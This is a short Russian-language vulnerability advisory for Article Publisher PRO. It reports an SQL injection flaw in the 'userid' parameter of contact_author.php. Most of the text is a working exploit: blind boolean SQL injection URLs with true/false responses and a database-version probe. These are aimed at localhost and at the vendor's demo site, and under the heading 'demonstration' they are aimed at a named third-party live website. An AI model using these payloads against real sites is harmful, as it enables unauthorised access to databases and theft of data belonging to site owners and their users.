Программа: Article Publisher PRO

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «userid» сценарием contact_author.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://localhost/contact_author.php?userid=1+and+1=1 true

http://localhost/contact_author.php?userid=1+and+1=0 false

http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1
true

http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0
false

http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4
true

http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5
false

Демонстрация:

http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4
true

http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5
false



Оставить мнение